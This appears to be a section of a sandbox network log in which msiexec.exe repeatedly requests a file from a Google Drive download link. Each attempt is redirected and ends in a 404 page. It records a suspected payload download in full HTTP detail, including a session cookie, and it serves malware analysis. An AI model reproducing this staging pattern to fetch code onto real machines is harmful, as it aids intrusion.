2025-01-11 03:27:48 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 39 4a 4a 56 61 63 67 6c 71 54 4f 34 59 4e 6f 37 69 46 4a 46 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="09JJVacglqTO4YNo7iFJFg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.11	50023	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:48 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:49 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:49 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-fRLLojVnzDLv6lP26xGogw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.11	50024	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:50 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:50 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgT9xr7it8Rgcr3Xz5lTsVVywixiDJXnErw1G6eJhumAf83hodMDaIkhepSZlZR--T4-DR3TzDI Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:50 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-W-WIyNEwV_ghaF9GwlXr9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:50 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 38 41 67 72 73 51 61 2d 30 79 75 4c 58 75 4f 45 39 48 37 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-8AgrsQa-0yuLXuOE9H7iQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.11	50025	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:51 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:51 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:51 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-qaXqUM3Q6WTpSp0H38t2oA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.11	50026	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:52 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:52 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgTDuc0UDFJO0_mm_jUyfvdGUqnSPsz-2_T52PC4_hsAPzY0kjneaYr-IlW4TZ6jTj-1 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:52 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-pyT6W1G6vLBQN3Z3lb22Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:52 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 6d 76 64 37 57 35 62 63 6a 6f 42 4b 47 77 4e 46 74 44 4a 34 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fmvd7W5bcjoBKGwNFtDJ4g">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.11	50027	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:53 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:53 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:53 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-8EfQpF01J1HOgbO-lH-axw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.11	50028	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:54 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:55 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgR6w1T6FK8Wa5pVwgMgrAD6WAPGSykW_xqDZhdsHtc6ni5MwNTDHVwUw3xk7ipZeuPS Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:54 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-g8yIBHOCvcYERNUCLEfd_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:55 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 76 62 5a 45 62 4f 4e 64 6f 34 6b 66 6e 33 79 46 4e 78 70 35 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AvbZEbONdo4kfn3yFNxp5Q">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.11	50029	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:55 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:56 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:56 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-P0mVC9wBM8zguCR-aVncIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.11	50030	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:56 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:57 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSxo-tuBjQGeatkXoG_ObH5X0NOx8HtL23YRv_K-ekRHhMEHU2X9TkuZUrkyiWUveMCFqirW2s Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:57 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-CXEIceGuWbSU5M0h8jXe0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
